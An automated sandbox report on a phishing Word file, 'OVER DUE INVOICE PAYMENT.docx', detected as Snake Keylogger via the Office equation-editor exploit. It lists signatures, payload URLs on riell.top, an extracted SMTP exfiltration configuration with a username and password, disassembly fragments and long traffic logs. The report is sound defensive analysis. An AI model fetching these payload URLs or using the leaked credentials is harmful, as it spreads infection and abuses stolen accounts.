Windows Analysis Report
OVER DUE INVOICE PAYMENT.docx

Overview

General Information

Sample name: OVER DUE INVOICE PAYMENT.docx
Analysis ID: 1467922
MD5: 9f3fd4e8aa2ad81966d0c2a036d1e901
SHA1: 80a58393acb58fcc666e56b514994d98ba3f4716
SHA256: cd9cf022180c8c6f6c4fb0d76476bf2e9382128d28a4686114c50448934e5381

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: SCR File Write Event
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Screensaver Binary File Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: https://riell.top/obb.scr Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp Avira: detection malicious, Label: EXP/CVE-2018-0798.Gen
Source: 0000000A.00000002.897811172.0000000002351000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "reservation@artefes.com", "Password": "ArtEfes4765*+", "Host": "mail.artefes.com", "Port": "587"}
Source: riell.top Virustotal: Detection: 5%
Source: https://riell.top/obb.scr Virustotal: Detection: 7%
Source: https://riell.top/obb.doc Virustotal: Detection: 7%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr Virustotal: Detection: 50%
Source: C:\Users\user\AppData\Roaming\obi23456.scr ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Roaming\obi23456.scr Virustotal: Detection: 50%
Source: OVER DUE INVOICE PAYMENT.docx ReversingLabs: Detection: 34%
Source: OVER DUE INVOICE PAYMENT.docx Virustotal: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\obi23456.scr Joe Sandbox ML: detected

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 188.114.97.3 Port: 443
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\obi23456.scr
Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.dr Stream path '_1781631827/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49162 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: obi23456.scr, 00000009.00000002.374423269.0000000000460000.00000004.08000000.00040000.00000000.sdmp, obi23456.scr, 00000009.00000002.374657544.0000000002161000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 10_2_001C5038
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 001C7B81h 10_2_001C78C1
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 001C5D07h 10_2_001C5B18
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 001C6691h 10_2_001C5B18
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 001C8143h 10_2_001C7D30
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 001C6A01h 10_2_001C6740
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 001C72C1h 10_2_001C7000
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 10_2_001C584B
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 001C8143h 10_2_001C8072
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 001C6E61h 10_2_001C6BA0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 001C7721h 10_2_001C7460
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 10_2_001C566A
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F12D1h 10_2_003F1028
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003FC2D1h 10_2_003FC028
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F9711h 10_2_003F9468
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F46F1h 10_2_003F4448
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F4B49h 10_2_003F48A0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F1729h 10_2_003F1480
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003FC729h 10_2_003FC480
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F4FA1h 10_2_003F4CF8
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F9B91h 10_2_003F98E8
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F1B81h 10_2_003F18D8
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003FCC15h 10_2_003FC8D8
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F1FD9h 10_2_003F1D30
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F53F9h 10_2_003F5150
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F9FE9h 10_2_003F9D40
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then lea esp, dword ptr [ebp-04h] 10_2_003F79AE
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F5851h 10_2_003F55A8
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003FA441h 10_2_003FA198
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F2431h 10_2_003F2188
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003FA899h 10_2_003FA5F0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F2889h 10_2_003F25E0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F2CE1h 10_2_003F2A38
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F5CA9h 10_2_003F5A00
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003FACF1h 10_2_003FAA48
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003FB149h 10_2_003FAEA0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then lea esp, dword ptr [ebp-04h] 10_2_003F7698
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F3139h 10_2_003F2E90
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F3591h 10_2_003F32E8
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F05C9h 10_2_003F0320
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003FB5CAh 10_2_003FB320
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F0A21h 10_2_003F0778
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003FBA21h 10_2_003FB778
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F39E9h 10_2_003F3740
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F3E41h 10_2_003F3B98
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F4299h 10_2_003F3FF0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003F0E79h 10_2_003F0BD0
Source: C:\Users\user\AppData\Roaming\obi23456.scr Code function: 4x nop then jmp 003FBE79h 10_2_003FBBD0
Source: global traffic DNS query: name: riell.top (10 consecutive queries)
Source: global traffic DNS query: name: checkip.dyndns.org (2 consecutive queries)
Source: global traffic DNS query: name: riell.top (2 consecutive queries)
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: riell.top (2 consecutive queries)
Source: global traffic DNS query: name: checkip.dyndns.org (2 consecutive queries)
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org (2 consecutive queries)
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org (2 consecutive queries)
Source: global traffic DNS query: name: reallyfreegeoip.org (2 consecutive queries)
Source: global traffic DNS query: name: checkip.dyndns.org (3 consecutive queries)
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org (2 consecutive queries)
Source: global traffic DNS query: name: reallyfreegeoip.org
Source: global traffic DNS query: name: checkip.dyndns.org (2 consecutive queries)
Source: global traffic DNS query: name: reallyfreegeoip.org (2 consecutive queries)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80 (3 consecutive entries)
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 193.122.6.168:80
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 193.122.130.0:80
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 193.122.130.0:80
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 132.226.247.73:80
Source: global traffic TCP traffic: 192.168.2.22:49182 -> 132.226.8.169:80
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 193.122.6.168:80
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 188.114.96.3:443 (12 consecutive entries)
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443 (9 consecutive entries)
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443 (10 consecutive entries)
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443 (8 consecutive entries)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443 (8 consecutive entries)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443 (175 consecutive entries)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
